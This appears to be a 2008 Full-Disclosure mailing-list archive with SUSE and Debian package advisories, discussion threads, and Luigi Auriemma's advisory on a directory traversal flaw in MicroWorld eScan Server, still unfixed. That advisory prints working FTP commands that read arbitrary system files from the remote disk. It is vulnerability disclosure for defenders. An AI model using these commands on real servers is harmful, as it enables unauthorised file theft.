ftp://ftp.suse.com/pub/suse/update/10.1/rpm/ppc/cups-client-1.1.23-40.38.ppc.rpm 074944cc0244f49ea5ca0c39866e5e85 ftp://ftp.suse.com/pub/suse/update/10.1/rpm/ppc/cups-devel-1.1.23-40.38.ppc.rpm aed89c7c4d0832c7df289cf28b73cfe9 ftp://ftp.suse.com/pub/suse/update/10.1/rpm/ppc/cups-libs-1.1.23-40.38.ppc.rpm 6fb7c82e682182e4e584ede96c87f2de x86-64 Platform: openSUSE 10.3: http://download.opensuse.org/pub/opensuse/update/10.3/rpm/x86_64/cups-1.2.12-22.9.x86_64.rpm fd8d905a8129fdcf79f17b6c35a1e99c http://download.opensuse.org/pub/opensuse/update/10.3/rpm/x86_64/cups-client-1.2.12-22.9.x86_64.rpm eb74b82bc67cd0bf048ac75d56e86c54 http://download.opensuse.org/pub/opensuse/update/10.3/rpm/x86_64/cups-devel-1.2.12-22.9.x86_64.rpm 30a69685925386b6fd6a287463f5c596 http://download.opensuse.org/pub/opensuse/update/10.3/rpm/x86_64/cups-libs-1.2.12-22.9.x86_64.rpm c47e7346ffa3054b9e79b06f4a68f4da http://download.opensuse.org/pub/opensuse/update/10.3/rpm/x86_64/cups-libs-32bit-1.2.12-22.9.x86_64.rpm 15784eb2174e331113e3fd7f313fcf38 openSUSE 10.2: ftp://ftp.suse.com/pub/suse/update/10.2/rpm/x86_64/cups-1.2.7-12.11.x86_64.rpm 3ed2e2dbb567a458071bf2f15e36fcab ftp://ftp.suse.com/pub/suse/update/10.2/rpm/x86_64/cups-client-1.2.7-12.11.x86_64.rpm 746c10e52f6e34b004906dcb705b4d3f ftp://ftp.suse.com/pub/suse/update/10.2/rpm/x86_64/cups-devel-1.2.7-12.11.x86_64.rpm becb337fcdc4e04325d8abe940056751 ftp://ftp.suse.com/pub/suse/update/10.2/rpm/x86_64/cups-libs-1.2.7-12.11.x86_64.rpm 2eeec7af8a643fa95bdf38f9e00b67fa ftp://ftp.suse.com/pub/suse/update/10.2/rpm/x86_64/cups-libs-32bit-1.2.7-12.11.x86_64.rpm 1f7552edbbc1c7d06c7c68924f3bce8d SUSE LINUX 10.1: ftp://ftp.suse.com/pub/suse/update/10.1/rpm/x86_64/cups-1.1.23-40.38.x86_64.rpm e987389ac8c86b42e35c8ec7937b837d ftp://ftp.suse.com/pub/suse/update/10.1/rpm/x86_64/cups-client-1.1.23-40.38.x86_64.rpm a8daa44c9179ab1fd4fbeee199861658 ftp://ftp.suse.com/pub/suse/update/10.1/rpm/x86_64/cups-devel-1.1.23-40.38.x86_64.rpm ce844e64c5340593a9da6828afe279b9 ftp://ftp.suse.com/pub/suse/update/10.1/rpm/x86_64/cups-libs-1.1.23-40.38.x86_64.rpm e5548c55b068f015d7e18f5e02e7ce2e ftp://ftp.suse.com/pub/suse/update/10.1/rpm/x86_64/cups-libs-32bit-1.1.23-40.38.x86_64.rpm 5d2a7df4d6c7c38f2fd0be0860fcee70 Sources: openSUSE 10.3: http://download.opensuse.org/pub/opensuse/update/10.3/rpm/src/cups-1.2.12-22.9.src.rpm c8beb8c8be3b611388b81bd3e7c3d9b0 openSUSE 10.2: ftp://ftp.suse.com/pub/suse/update/10.2/rpm/src/cups-1.2.7-12.11.src.rpm 6a7c78bf03906366efc3c7b996db0382 SUSE LINUX 10.1: ftp://ftp.suse.com/pub/suse/update/10.1/rpm/src/cups-1.1.23-40.38.src.rpm 6fadf975197cd21eb83174d32ee192c7 Our maintenance customers are notified individually. The packages are offered for installation from the maintenance web: Open Enterprise Server http://support.novell.com/techcenter/psdb/1addc7e3aa69e266f0fba3fdfef8b6c7.html Novell Linux POS 9 http://support.novell.com/techcenter/psdb/1addc7e3aa69e266f0fba3fdfef8b6c7.html Novell Linux Desktop 9 http://support.novell.com/techcenter/psdb/1addc7e3aa69e266f0fba3fdfef8b6c7.html SuSE Linux Enterprise Server 8 http://support.novell.com/techcenter/psdb/1addc7e3aa69e266f0fba3fdfef8b6c7.html SUSE Linux Enterprise Server 10 SP1 http://support.novell.com/techcenter/psdb/1addc7e3aa69e266f0fba3fdfef8b6c7.html SUSE Linux Enterprise Desktop 10 SP1 http://support.novell.com/techcenter/psdb/1addc7e3aa69e266f0fba3fdfef8b6c7.html SUSE SLES 9 http://support.novell.com/techcenter/psdb/1addc7e3aa69e266f0fba3fdfef8b6c7.html ______________________________________________________________________________ 5) Pending Vulnerabilities, Solutions, and Work-Arounds: Please consult our weekly summary report. ______________________________________________________________________________ 6) Authenticity Verification and Additional Information - Announcement authenticity verification: SUSE security announcements are published via mailing lists and on Web sites. The authenticity and integrity of a SUSE security announcement is guaranteed by a cryptographic signature in each announcement. All SUSE security announcements are published with a valid signature. To verify the signature of the announcement, save it as text into a file and run the command gpg --verify replacing with the name of the file where you saved the announcement. The output for a valid signature looks like: gpg: Signature made using RSA key ID 3D25D3D9 gpg: Good signature from "SuSE Security Team " where is replaced by the date the document was signed. If the security team's key is not contained in your key ring, you can import it from the first installation CD. To import the key, use the command gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc - Package authenticity verification: SUSE update packages are available on many mirror FTP servers all over the world. While this service is considered valuable and important to the free and open source software community, the authenticity and the integrity of a package needs to be verified to ensure that it has not been tampered with. There are two verification methods that can be used independently from each other to prove the authenticity of a downloaded file or RPM package: 1) Using the internal gpg signatures of the rpm package 2) MD5 checksums as provided in this announcement 1) The internal rpm package signatures provide an easy way to verify the authenticity of an RPM package. Use the command rpm -v --checksig to verify the signature of the package, replacing with the filename of the RPM package downloaded. The package is unmodified if it contains a valid signature from build at suse.de with the key ID 9C800ACA. This key is automatically imported into the RPM database (on RPMv4-based distributions) and the gpg key ring of 'root' during installation. You can also find it on the first installation CD and at the end of this announcement. 2) If you need an alternative means of verification, use the md5sum command to verify the authenticity of the packages. Execute the command md5sum after you downloaded the file from a SUSE FTP server or its mirrors. Then compare the resulting md5sum with the one that is listed in the SUSE security announcement. Because the announcement containing the checksums is cryptographically signed (by security at suse.de), the checksums show proof of the authenticity of the package if the signature of the announcement is valid. Note that the md5 sums published in the SUSE Security Announcements are valid for the respective packages only. Newer versions of these packages cannot be verified. - SUSE runs two security mailing lists to which any interested party may subscribe: opensuse-security at opensuse.org - General Linux and SUSE security discussion. All SUSE security announcements are sent to this list. To subscribe, send an e-mail to . opensuse-security-announce at opensuse.org - SUSE's announce-only mailing list. Only SUSE's security announcements are sent to this list. To subscribe, send an e-mail to . ===================================================================== SUSE's security contact is or . The public key is listed below. ===================================================================== ______________________________________________________________________________ The information in this advisory may be distributed or reproduced, provided that the advisory is not modified in any way. In particular, the clear text signature should show proof of the authenticity of the text. SUSE Linux Products GmbH provides no warranties of any kind whatsoever with respect to the information contained in this security advisory. Type Bits/KeyID Date User ID pub 2048R/3D25D3D9 1999-03-06 SuSE Security Team pub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.4.2 (GNU/Linux) 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 =ypVs - -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iQEVAwUBR8++l3ey5gA9JdPZAQLnQQf/faDZxMhd4sZDgWmwjniWkevXcp4t7gYk k61GWtabRlEalwHmLVfORjjrpCD/khNmY36Gluf4EI4Yk6IAbnfNIn1+J3QIPYAy 9kk056Yfe8L7AhgjKGIHuFideRErjj25EYeWRXoc+iLWv11eJs7RICbBzLQqGNHK tfSTa9XhZoCrkSWMhdcU17jXOMZhwur0yFXzeWb5U1JsHqgsMeqlKAYS1GzhdSCf wKScwSayueA62AUkrzwD3jzm+ORooPOdTyXNvrDOV3h/Pyz7q1wF2J9e8Rzn4Cla stuwKDzvZVqoIW/jmav8pZFWMAiABCyV/Gld6ikIm5h99Pwd9pDPNQ== =CS2J -----END PGP SIGNATURE----- From hackbunny at s0ftpj.org Thu Mar 6 13:15:23 2008 From: hackbunny at s0ftpj.org (KJK::Hyperion) Date: Thu, 06 Mar 2008 14:15:23 +0100 Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP! In-Reply-To: <47CEC5DF.2030000@s0ftpj.org> References: <20080304085355.GA19264@suse.de> <1865973b0803050454p11a65a51o1ca9898bfdd83159@mail.gmail.com> <8805f1180803050520h4360a708j2b2122d05bfffc09@mail.gmail.com> <47CEC5DF.2030000@s0ftpj.org> Message-ID: <47CFEE6B.6080005@s0ftpj.org> KJK::Hyperion ha scritto: >> "Previous scanning worms, such as Code Red, spread via many threads, >> each invoking connect() to probe random addresses. > what the hell is this? visiting the iniquity of the applications upon > the protocols? Winsock is probably the only API that lets you connect() > asynchronously I stand corrected! you can obviously use a non-blocking connect() with select(), as well. You wacky socket APIs, what predicament will you not get into! From kurtdillard at msn.com Thu Mar 6 13:52:21 2008 From: kurtdillard at msn.com (Kurt Dillard) Date: Thu, 6 Mar 2008 11:52:21 -0200 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: <6450e99d0803060146m5ff83578pbe3cd9d4beac1303@mail.gmail.com> References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> <20080306092153.GA1626@chaotica> <6450e99d0803060146m5ff83578pbe3cd9d4beac1303@mail.gmail.com> Message-ID: The assertions in the article and some of the comments in this thread sure look racist and xenophobic to me. Why is it more risky that a product is produced in China than if its made in Seattle, WA; Arlington, VA; Mexico City; London; or Berlin? The Chinese may have the skill and motivation to do this, but so does the USA, Russia, France, and most of the first world countries. You read about China breaking into US government computers, what you don't read about so much is the industrial espionage facilitated by Israeli and European governments to help firms within their countries to compete much less all of the spying the US does against the entire world. The risk is there, the risk may be higher with certain products and specific open source projects, but its there regardless of where the product is made. On top of that, a very large portion of the designers, engineers, and programmers for high-tech products made in the USA are foreign nationals. Why would the Chinese government need to slip a back door into a router where all they could do is pick up encrypted network traffic when instead they could turn a kernel programmer at Apple, Sun, or Microsoft and get a backdoor slipped into the encryption algorithms and the kernel itself? From staticrez at gmail.com Thu Mar 6 14:13:05 2008 From: staticrez at gmail.com (Static Rez) Date: Thu, 6 Mar 2008 09:13:05 -0500 Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP! In-Reply-To: <47CFEE6B.6080005@s0ftpj.org> References: <20080304085355.GA19264@suse.de> <1865973b0803050454p11a65a51o1ca9898bfdd83159@mail.gmail.com> <8805f1180803050520h4360a708j2b2122d05bfffc09@mail.gmail.com> <47CEC5DF.2030000@s0ftpj.org> <47CFEE6B.6080005@s0ftpj.org> Message-ID: <5d80962a0803060613m63675c6fl57e960e53526e79f@mail.gmail.com> Isn't it true that a TCP packet is typically 20 bytes, and a UDP packet about 8? This is minus any additional data that has been added to the packet. If this is true, then depending on the size of the pipe your sending the data through, and the amount of congestion there might be, a UDP packet would more easily and quickly hit its destination. On Thu, Mar 6, 2008 at 8:15 AM, KJK::Hyperion wrote: > KJK::Hyperion ha scritto: > >> "Previous scanning worms, such as Code Red, spread via many threads, > >> each invoking connect() to probe random addresses. > > what the hell is this? visiting the iniquity of the applications upon > > the protocols? Winsock is probably the only API that lets you connect() > > asynchronously > > I stand corrected! you can obviously use a non-blocking connect() with > select(), as well. You wacky socket APIs, what predicament will you not > get into! > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080306/9a510e9c/attachment.html From vvandal at well.com Thu Mar 6 16:30:50 2008 From: vvandal at well.com (Vic Vandal) Date: Thu, 6 Mar 2008 08:30:50 -0800 (PST) Subject: [Full-disclosure] CarolinaCon-2008, March 28th-30th, full agenda posted In-Reply-To: References: Message-ID: Final message about the upcoming Con in the Raleigh/Durham/Chapel Hill area of NC. Full talk abstracts and speaker bios are now online: http://www.carolinacon.org/lineup.html Other side event details are forthcoming. Countdown = three weeks. Peace, Vic From dancho.danchev at gmail.com Thu Mar 6 16:12:54 2008 From: dancho.danchev at gmail.com (Dancho Danchev) Date: Thu, 6 Mar 2008 08:12:54 -0800 Subject: [Full-disclosure] More CNET Sites Under IFRAME Attack Message-ID: With the recent IFRAME injection attack targeting ZDNet Asia, by abusing the site's search engine caching capabilities in a combination with the lack of input sanitization, several more CNET Networks' web properties besides ZDNet Asia, namely, TV.com, News.com and MySimon.com are currently getting targeted using the same technique to inject the IFRAMEs and have the sites cache and locally host the results. The following assessement outlines the IPs and domains used in the IFRAMEs, the domains and IPs hosting the rogue anti-virus and anti-spyware applications, as well as the detection rates of the applications. http://ddanchev.blogspot.com/2008/03/more-cnet-sites-under-iframe-attack.html Regards -- Dancho Danchev Cyber Threats Analyst/Blogger http://ddanchev.blogspot.com http://windowsecurity.com/Dancho_Danchev From Larry at larryseltzer.com Thu Mar 6 17:50:47 2008 From: Larry at larryseltzer.com (Larry Seltzer) Date: Thu, 6 Mar 2008 12:50:47 -0500 Subject: [Full-disclosure] Firewire Attack on Windows Vista In-Reply-To: <20080305193745.A25582@gwyn.tux.org> References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> Message-ID: <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> >>Roger, you should note that Adam's "Hit by a Bus" paper includes information about how Linux users can load their OS' Firewire driver in a way that should disallow physical memory DMA access, and close this attack vector. What are the implications for firewire device compatibility of doing this? Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ Contributing Editor, PC Magazine larry.seltzer at ziffdavisenterprise.com From aluigi at autistici.org Thu Mar 6 18:18:40 2008 From: aluigi at autistici.org (Luigi Auriemma) Date: Thu, 6 Mar 2008 19:18:40 +0100 Subject: [Full-disclosure] Directory traversal in MicroWorld eScan Server 9.0.742.98 Message-ID: <20080306191840.cf2888e4.aluigi@autistici.org> ####################################################################### Luigi Auriemma Application: MicroWorld eScan Server (aka eScan Management Console) http://www.mwti.net Versions: <= 9.0.742.98 Platforms: Windows Bug: directory traversal Exploitation: remote Date: 06 Mar 2008 Author: Luigi Auriemma e-mail: aluigi at autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== >From vendor's website: "The Powerful Management Console of eScan provides options for system administrators to remotely administer a vast network of clients. It also allows them to remotely install eScan, deploy upgrades and updates and enforce an Integrated Security Policy for the entire Enterprise." ####################################################################### ====== 2) Bug ====== The eScan Server (eserv.exe) listens on port 2021 for FTP connections using c:\pub as root path. Although the server tries to avoid possible directory traversal attacks for example rejecting the dotdot patterns, is still possible for an attacker to download any file from the disk of the remote system simply applying a slash or a backslash at the beginning of the filename for selecting the root path of the disk. For example /boot.ini, \windows\win.ini and so on. Only downloading files is allowed by the server, so deleting or uploading custom files is not possible. ####################################################################### =========== 3) The Code =========== ftp://SERVER:2021//windows/win.ini or manually: ftp -A open SERVER 2021 get /windows/win.ini local_win.ini ####################################################################### ====== 4) Fix ====== No fix ####################################################################### --- Luigi Auriemma http://aluigi.org From skx at debian.org Thu Mar 6 18:36:59 2008 From: skx at debian.org (Steve Kemp) Date: Thu, 6 Mar 2008 18:36:59 +0000 Subject: [Full-disclosure] [SECURITY] [DSA 1513-1] New lighttpd packages fix CGI source disclosure Message-ID: <20080306183659.GA24810@steve.org.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1513-1 security at debian.org http://www.debian.org/security/ Steve Kemp March 06, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : lighttpd Vulnerability : information disclosure Problem type : remote Debian-specific: no CVE Id(s) : CVE-2008-1111 It was discovered that lighttpd, a fast webserver with minimal memory footprint, would display the source to CGI scripts if their execution failed in some circumstances. For the stable distribution (etch), this problem has been fixed in version 1.4.13-4etch5. For the unstable distribution, this problem will be fixed soon. We recommend that you upgrade your lighttpd package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch5.diff.gz Size/MD5 checksum: 36835 fa55bbf4bf1b9a555cc4b7b368a059f6 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13.orig.tar.gz Size/MD5 checksum: 793309 3a64323b8482b0e8a6246dbfdb4c39dc http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch5.dsc Size/MD5 checksum: 1098 52f5881ec943188d8276c600902c84f5 Architecture independent packages: http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-doc_1.4.13-4etch5_all.deb Size/MD5 checksum: 99430 b13f37c0c8b55e145e6f823d5dd82dee alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch5_alpha.deb Size/MD5 checksum: 71646 3d0308407b0b089bb8d8a215503f20d8 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch5_alpha.deb Size/MD5 checksum: 59412 cf3dc4218076b66d5fb04e40cb6e6a03 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch5_alpha.deb Size/MD5 checksum: 64832 c58a1cfc4a506351ef2425f4e4018113 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.13-4etch5_alpha.deb Size/MD5 checksum: 61170 0a2a5196ed776076f29fb8a85976387e http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.13-4etch5_alpha.deb Size/MD5 checksum: 64402 58268f6c0dc00b8e0fe16f5cf93a6d86 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch5_alpha.deb Size/MD5 checksum: 318776 55890a8afec6ff4fba50ff2e8ac4df6c amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch5_amd64.deb Size/MD5 checksum: 69738 92677861a76629b9a3361c2c338d5bb0 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.13-4etch5_amd64.deb Size/MD5 checksum: 63434 98b26e827bb4c8a023239a90bfdb45a2 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.13-4etch5_amd64.deb Size/MD5 checksum: 60586 a3c573b8d1f921fb93fd28e33ee86d4f http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch5_amd64.deb Size/MD5 checksum: 58994 de8951a3316888b5874f3b3ee0abe755 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch5_amd64.deb Size/MD5 checksum: 63726 0ca9bf4df2ca8260495146011e6d3a53 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch5_amd64.deb Size/MD5 checksum: 297048 a12c33257671acdd291f41b7b7f8c64d arm architecture (ARM) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch5_arm.deb Size/MD5 checksum: 286092 3821f3f07c614ccf1a98cdec79301a18 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch5_arm.deb Size/MD5 checksum: 58528 1e3e7f75c172bb082c7b083110194c9f http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.13-4etch5_arm.deb Size/MD5 checksum: 60664 489518ec1610f510562a1d0a2dfcb940 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch5_arm.deb Size/MD5 checksum: 69414 41096405646828e7a63a6e4b208d5497 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch5_arm.deb Size/MD5 checksum: 62916 e74d042125f02400c48f2763d34e6d9a http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.13-4etch5_arm.deb Size/MD5 checksum: 62718 3d19c37366365f0e7f3ee06da00df623 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch5_hppa.deb Size/MD5 checksum: 324114 f8cc861ec3e948179387ee31f6f9f3b4 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.13-4etch5_hppa.deb Size/MD5 checksum: 61616 fe5f56af17823da3ef58b9a0b8e6d298 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch5_hppa.deb Size/MD5 checksum: 72826 517acc9044c0d82adea99c3d1ca1f0cc http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.13-4etch5_hppa.deb Size/MD5 checksum: 64824 81bd6d5482ce8a3c5179edeecfd08346 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch5_hppa.deb Size/MD5 checksum: 59764 5d3f99e779ef096348b6749e4c809ba4 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch5_hppa.deb Size/MD5 checksum: 65288 bdd83e24259d7f2922c3a95b8293b36c i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch5_i386.deb Size/MD5 checksum: 58916 caed74881673974288bbc290b3ba3479 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch5_i386.deb Size/MD5 checksum: 63722 5363ca45b9753e937fa011b163e2f376 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.13-4etch5_i386.deb Size/MD5 checksum: 63530 dda93744e3b76dd8f9e4a3dba20ca07a http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.13-4etch5_i386.deb Size/MD5 checksum: 60684 fb1d5f0bcbabae22f148425b4c42fae5 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch5_i386.deb Size/MD5 checksum: 70772 73b0ecdcafb617bf8e2e442f1886d9b0 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch5_i386.deb Size/MD5 checksum: 288902 30283b07cea3f0a26dc1a38b839f2807 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch5_ia64.deb Size/MD5 checksum: 403296 6c366b8fed9ff23f19aaf50a66931a69 